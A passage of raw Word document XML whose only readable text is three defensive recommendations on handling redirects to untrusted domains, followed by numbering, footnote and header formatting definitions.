      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="35352C1E" w14:paraId="51D82113" w14:textId="4719521F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:t xml:space="preserve">Block redirects to untrusted domains </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="35352C1E" w14:paraId="459D687C" w14:textId="7218D992">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:t xml:space="preserve">Display warning prompts before redirecting users externally </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="35352C1E" w14:paraId="769D0D3C" w14:textId="3DFE7631">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:t>Conduct secure design reviews for navigation flows</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00966105">
      <w:footerReference w:type="default" r:id="rId17"/>
      <w:pgSz w:w="12240" w:h="15840" w:orient="portrait"/>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D2BD2" w:rsidRDefault="00CD2BD2" w14:paraId="1FB9C192" w14:textId="77777777">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00CD2BD2" w:rsidRDefault="00CD2BD2" w14:paraId="28C0AFCB"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485EA61B" w:rsidTr="485EA61B" w14:paraId="049CEA0F" w14:textId="77777777">
      <w:trPr>
        <w:trHeight w:val="300"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3360" w:type="dxa"/>
        </w:tcPr>
        <w:p w:rsidR="485EA61B" w:rsidP="485EA61B" w:rsidRDefault="485EA61B" w14:paraId="1EDAB549" w14:textId="5AEA157E">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:ind w:left="-115"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3360" w:type="dxa"/>
        </w:tcPr>
        <w:p w:rsidR="485EA61B" w:rsidP="485EA61B" w:rsidRDefault="485EA61B" w14:paraId="66A823A9" w14:textId="53F547B3">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:jc w:val="center"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3360" w:type="dxa"/>
        </w:tcPr>
        <w:p w:rsidR="485EA61B" w:rsidP="485EA61B" w:rsidRDefault="485EA61B" w14:paraId="6D702A33" w14:textId="32087582">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:ind w:right="-115"/>
            <w:jc w:val="right"/>
          </w:pPr>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w:rsidR="485EA61B" w:rsidP="485EA61B" w:rsidRDefault="485EA61B" w14:paraId="1F7A74CD" w14:textId="5DC277F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D2BD2" w:rsidRDefault="00CD2BD2" w14:paraId="5011AC90" w14:textId="77777777">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00CD2BD2" w:rsidRDefault="00CD2BD2" w14:paraId="540C0613" w14:textId="7777777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68673B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="1E0E79FC">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="2DE2995A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="BDD2D2C4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="33C8F2B2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="4D9E1242">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="EC02D230">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="0C60FC58">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="4296D5C8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="DF101408">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0EAC6CE1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="BE4CDDC6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="A8F8E2C8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="9A2621F8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="A5E24A02">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="8D742642">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="06BE0E60">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="DCDEE5C8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="DD14F9E2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="E0F0E5C6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2376C225"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="C132478C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="293C7124">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="E08E3244">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="D7FEAEFC">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="83DAB62E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="A7864D1E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="C66E15F2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="30022A3C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="B8680278">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="24D95B20"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="90881C22">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="9672FD92">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="8C308902">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="A66AD4AA">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="316C7A9E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="68863D76">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="4B847F7A">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="F5FED150">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="A54E0CBC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2E84300C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="66E84A28">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="62DAC786">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="DFA2EC84">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="03DA0D2C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="B8507640">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0548DBCE">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="FF7CFAE4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="BED0D3E2">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="2CF041A0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="38073DDA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="E1229B1E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="342A8804">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="769E125A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="8E1ADE4A">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="60262854">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="A9E2C2E2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="0674DCF0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="89169A0E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="B1DCC680">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3E69FFBF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="18F6047E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="AE603278">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="8264953A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="6EFC51A6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="AE5A6656">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="737CB8FC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="19AC33B8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="6E2E6BA6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="52CE3E00">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="458E3E79"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="9C8E83D0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="6C8E26EA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="578E76DC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="47CCE92C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="F6908A82">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="2080406E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="35F8F0D4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="88B86F3C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="B2028F34">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4C913924"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="FD541AE0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="4B22D780">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="01D6E418">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="F7122E74">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="89D40FBE">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="41387FDE">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="EC2CD692">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="4FFABE4E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="6C36AF3C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
